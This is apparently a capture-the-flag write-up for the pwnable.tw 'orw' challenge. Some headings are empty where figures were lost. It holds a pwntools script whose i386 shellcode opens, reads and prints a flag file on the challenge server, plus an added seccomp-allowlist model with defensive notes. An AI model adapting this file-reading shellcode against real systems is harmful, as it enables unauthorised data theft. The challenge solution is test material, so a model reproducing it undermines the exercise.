Challenge


Solving

Running the binary:

And part of the main disassembly:

The binary reads our payload, stores it at the address 0x8048370, and then runs the code there.

As the problem description says, we should probably build a shellcode that uses only the open, read and write syscalls.
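An added example, not from the original post: assuming the open/read/write restriction is enforced with a seccomp-BPF allowlist (the post does not say how), this models such a filter and evaluates it offline. `build_allowlist`, `seccomp_data`, `run_filter` and `ORW_FILTER` are hypothetical names, and the sample syscall records are constructed.

```python
import struct

# Constants from <linux/audit.h>, <linux/seccomp.h> and <linux/bpf_common.h>
AUDIT_ARCH_I386 = 0x40000003
SECCOMP_RET_KILL = 0x00000000
SECCOMP_RET_ALLOW = 0x7FFF0000
LD_W_ABS, JEQ_K, RET_K = 0x20, 0x15, 0x06

# i386 syscall numbers; 3, 4 and 5 are the values the script loads into eax
I386_NR = {"read": 3, "write": 4, "open": 5, "execve": 11}


def build_allowlist(allowed_nrs):
    """Return a classic-BPF program as (code, jt, jf, k) tuples."""
    prog = [
        (LD_W_ABS, 0, 0, 4),                      # A = seccomp_data.arch
        (JEQ_K, 1, 0, AUDIT_ARCH_I386),           # right ABI: skip the kill
        (RET_K, 0, 0, SECCOMP_RET_KILL),          # wrong ABI: deny
        (LD_W_ABS, 0, 0, 0),                      # A = seccomp_data.nr
    ]
    for nr in allowed_nrs:
        prog.append((JEQ_K, 0, 1, nr))            # match: fall into ALLOW
        prog.append((RET_K, 0, 0, SECCOMP_RET_ALLOW))
    prog.append((RET_K, 0, 0, SECCOMP_RET_KILL))  # default deny
    return prog


def seccomp_data(nr, arch=AUDIT_ARCH_I386, args=()):
    """Pack struct seccomp_data: nr, arch, instruction_pointer, args[6]."""
    args = tuple(args) + (0,) * (6 - len(args))
    return struct.pack("<iIQ6Q", nr, arch, 0, *args)


def run_filter(prog, data):
    """Interpret the three opcodes used above and return the verdict."""
    pc, acc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        pc += 1
        if code == LD_W_ABS:
            acc = struct.unpack_from("<I", data, k)[0]
        elif code == JEQ_K:
            pc += jt if acc == k else jf
        elif code == RET_K:
            return k
        else:
            raise ValueError("unsupported opcode")


ORW_FILTER = build_allowlist([I386_NR[n] for n in ("open", "read", "write")])
```

The verdict depends only on the ABI and the syscall number, never on the arguments, so an allowlist like this still lets the process open and print any file its UID can read. File permissions or argument-level checks have to cover that gap.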

Here is my Python script:

#!/usr/bin/env python
# pwnable.tw orw

from pwn import *

debug = 0

def exploit():
	shellcode = b''							# bytes, so it concatenates with asm() output on Python 3 too
	shellcode += asm('mov eax, 0x5')		# syscall : open
	shellcode += asm('mov ebx, 0x804a09c')	# filename (address of the path string appended below)
	shellcode += asm('mov ecx, 0x0')		# flags (O_RDONLY)
	shellcode += asm('mov edx, 0x804a0ab')	# mode (address of the 'r' string below; open ignores mode without O_CREAT)
	shellcode += asm('int 0x80')
	shellcode += asm('mov ebx, eax')		# fd returned by open
	shellcode += asm('mov eax, 0x3')		# syscall : read
	shellcode += asm('mov ecx, 0x804a100')	# buf
	shellcode += asm('mov edx, 0x64')		# count
	shellcode += asm('int 0x80')
	shellcode += asm('mov edx, eax')		# count (bytes returned by read)
	shellcode += asm('mov eax, 0x4')		# syscall : write
	shellcode += asm('mov ebx, 0x1')		# fd (stdout)
	shellcode += asm('mov ecx, 0x804a100')	# buf
	shellcode += asm('int 0x80')
	shellcode += b'/home/orw/flag\x00'		# path string referenced by ebx above
	shellcode += b'r\x00'					# string referenced by edx above
	s.send(shellcode)

if __name__ == '__main__':
	if debug:
		s = process('./orw')
		pause()
	else:
		s = remote('chall.pwnable.tw', 10001)

	exploit()
	s.interactive()
	s.close()


FL4G
